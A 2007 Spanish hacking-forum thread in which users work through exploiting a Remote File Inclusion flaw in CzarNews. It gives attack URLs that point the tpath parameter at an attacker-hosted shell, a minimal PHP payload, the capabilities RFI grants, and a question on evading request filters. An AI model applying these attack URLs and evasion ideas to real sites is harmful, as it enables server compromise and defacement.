elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  [?] File include		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: [?] File include  (Leído 6,905 veces)
Rienzi

Desconectado Desconectado

Mensajes: 39


Ver Perfil
[?] File include
« en: 20 Agosto 2007, 13:53 pm »
Saludos!! me gustaría comprender el funcionamiento del siguiente Exploit!!

http://www.securityfocus.com/bid/12857/exploit

Que debería hacer?¿? crear un archivo config en mi host y de ahí enlazarlo de la siguiente manera?

http://www.Victima.com/research/news/CzarNewsv113b/headlines.php?tpath=http://www.host.org/cn_config.php

También me gustaría saber si con esa vulnerabilidad podría cambiar el index o modificarlo un saludo.
En línea
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: [?] File include
« Respuesta #1 en: 20 Agosto 2007, 14:22 pm »
Se supone que www.victima.com es el servidor vulnerable al Remote File Inclusion y no tú.

PD: Date una vuelta por Google.
En línea
WannaBeHacker

Desconectado Desconectado

Mensajes: 273



Ver Perfil
Re: [?] File include
« Respuesta #2 en: 20 Agosto 2007, 14:28 pm »
Citar
http://www.example.com/research/news/CzarNewsv113b/headlines.php?tpath=http://www.example.org/cn_config.php

http://www.example.com/research/news/CzarNewsv113b/news.php?tpath=http://www.example.org/cn_config.php

Mmm, se supone que sería así no???

Por ejemplo:

http://www.PÁGINAVULNERABLE.com/research/news/CzarNewsv113b/headlines.php?tpath=http://www.TUSHELL.org/cn_config.txt?
En línea
Rienzi

Desconectado Desconectado

Mensajes: 39


Ver Perfil
Re: [?] File include
« Respuesta #3 en: 20 Agosto 2007, 14:50 pm »
pero que tipo de shell debería utilizar? conocen algún tutorial en Español para poder saber mas sobre esta vulnerabilidad ? Que podría hacer con ella??? ya e buscado por google y me aparecen vulns de otros tipos y una pila de cosas en árabe de todas formas probare esta tarde jejeje gracias por vuestra ayuda!!
En línea
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: [?] File include
« Respuesta #4 en: 20 Agosto 2007, 14:55 pm »
En http://www.example.org/cn_config.php se debe de encontrar el codigo PHP que se ejecutará en la página vulnerable, por ejemplo:

Código
  1. <?php
  2. echo "<?php phpinfo(); ?>";
  3. ?>

En caso de que el archivo sea un documento de texto bastará con escribirlo sin más:

Código
  1. <?php phpinfo(); ?>
En línea
Rienzi

Desconectado Desconectado

Mensajes: 39


Ver Perfil
Re: [?] File include
« Respuesta #5 en: 20 Agosto 2007, 16:36 pm »
y una vez con el Exploit listo que utilidad puedo darle?? modificar la configuracion de la web???
En línea
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: [?] File include
« Respuesta #6 en: 20 Agosto 2007, 16:54 pm »
Ejecutar cualquier código PHP en el servidor, o lo que es lo mismo, leer el código fuente de los archivos, poder establecer una conexión con la base de datos, crear/editar/eliminar archivos, etcétera.
En línea
Distorsion

Desconectado Desconectado

Mensajes: 238


15Hz ~ 20Hz


Ver Perfil
Re: [?] File include
« Respuesta #7 en: 20 Agosto 2007, 17:03 pm »
Aprovecho este post para preguntar una duda. Segun que paginas tienen modulos de seguridad como el php nuke que filtran las peticiones. He probado a ponerlo en ehadecimal en la url el RFI pero lo pilla igual es algo que se tiene en cuenta, la codificacion de caracteres. Sabeis alguna manera de saltarse el filtrado o alguna codificacion poco conocida y no implementada en los modulos de seguridad?¿
Saludos
En línea
Rienzi

Desconectado Desconectado

Mensajes: 39


Ver Perfil
Re: [?] File include
« Respuesta #8 en: 20 Agosto 2007, 17:26 pm »
ah ok muchisimas gracias , la shell deberia estar en php no? conoces de alguna ya hecha para que me haga mas o menos una idea de como seria la indicada para explotarla?¿
En línea
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: [?] File include
« Respuesta #9 en: 20 Agosto 2007, 17:43 pm »
Citar
https://foro.elhacker.net/index.php/topic,174536.0.html
En línea
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines